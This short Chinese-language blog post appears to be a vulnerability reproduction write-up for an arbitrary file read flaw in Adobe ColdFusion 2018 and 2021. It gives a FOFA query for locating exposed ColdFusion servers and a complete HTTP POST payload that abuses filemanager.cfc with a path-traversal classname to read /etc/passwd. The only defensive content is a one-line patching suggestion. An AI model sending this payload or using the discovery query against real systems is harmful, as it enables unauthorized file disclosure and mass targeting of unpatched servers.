Babing
Published on 2024-08-30 / 1 Visits
0
0

A2-2AdobeColdFusion-任意文件读取

A2-2AdobeColdFusion-任意文件读取

漏洞描述:

影响版本:

Adobe ColdFusion 2018 Update 15
Adobe ColdFusion 2021 Update 5

网站图片:

image.webp

网络测绘:

fofa语法:

FOFA:app=“Adobe-ColdFusion”

漏洞复现:

payload:

POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/filemanager.cfc?method=foo&_cfclient=true HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Connection: close

_variables={"_metadata":{"classname":"././././././/etc/passwd"}}

效果图:
image-20240619065241998

修复建议:

确保你的 ColdFusion 版本是最新的,并应用所有安全补丁。Adobe 经常发布安全补丁来修复已知漏洞。


Comment